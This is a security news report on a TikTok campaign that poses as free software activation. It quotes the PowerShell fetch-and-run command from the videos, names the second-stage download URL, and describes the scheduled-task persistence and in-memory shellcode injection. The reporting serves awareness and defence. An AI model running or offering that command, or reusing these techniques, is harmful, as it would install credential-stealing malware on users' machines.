Attackers are exploiting TikTok’s massive reach to trick users into executing malware through seemingly innocuous videos.
In one popular TikTok video (liked over 500 times), the attacker poses as a provider of a free Photoshop activation tool and urges viewers to open PowerShell as an administrator and run:
powershelliex (irm slmgr.win/photoshop)
This command uses Invoke-Expression (iex) to run a script fetched by Invoke-RestMethod (irm) from a malicious host.
Security researchers have uncovered a campaign where threat actors masquerade as Photoshop activators in TikTok clips, directing victims to run PowerShell one-liners that pull and execute malicious code.
The technique mirrors the ClickFix social-engineering scenario, wherein users are similarly duped into clicking and executing code on Microsoft blogs, exposing them to malware installation.
Upon visiting the provided link, victims receive a PowerShell payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) that currently registers a VirusTotal detection rate of 17/63, highlighting its relative novelty and evasion capabilities.
Once the initial script runs, it reaches out to https://file-epq.pages.dev/updater.exe to download the next stage, named Updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8).
Analysis reveals this binary is AuroStealer, a credential-harvesting trojan known for exfiltrating saved browser passwords and cryptocurrency wallets.
To maintain persistence, the PowerShell script randomly selects a task name from a list of legitimate update tasks (e.g., AdobeUpdateTask, WindowsUpdateCheck).
It then creates a scheduled task that launches PowerShell with hidden window style and bypasses execution policy, ensuring the Updater.exe runs at user logon without raising suspicion.
The use of legitimate task names helps the malicious persistence blend into normal system behaviour and evade detection.
On-The-Fly Compilation and In-Memory Execution
Following the AuroStealer stage, a further payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) is retrieved and launched.
This binary employs an advanced self-compiling malware technique: during execution, it invokes the .NET compiler csc.exe to compile source code stored in a temporary .cmdline file.
The compiled class contains P/Invoke declarations for VirtualAlloc, CreateThread, and WaitForSingleObject, enabling it to allocate memory, inject shellcode directly into the process, spawn a thread for execution, and wait indefinitely—resulting in fully in-memory payload execution without touching the disk.
Such on-demand compilation complicates static analysis and detection, as the final malicious code exists only in ephemeral memory.
Researchers have identified additional TikTok videos from the same campaign using different software lures such as “Activate Office” or “Unlock Windows,” indicating the attackers are iterating on social engineering themes to broaden their reach:
- hxxps://vm.tiktok.com/ZGdaC7EQY/
- hxxps://vm.tiktok.com/ZGdaX8jVq/
This campaign underscores the evolving tactics of cybercriminals, who now exploit short-form video platforms to deliver self-compiling, in-memory malware via PowerShell.
Users should never run terminal commands from unverified sources and platforms should consider alerting viewers when instructions encourage potentially dangerous operations.
As attackers persistently innovate, combining novel distribution channels and anti-analysis techniques, security awareness and robust endpoint defenses remain the best line of defense against these emerging threats.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
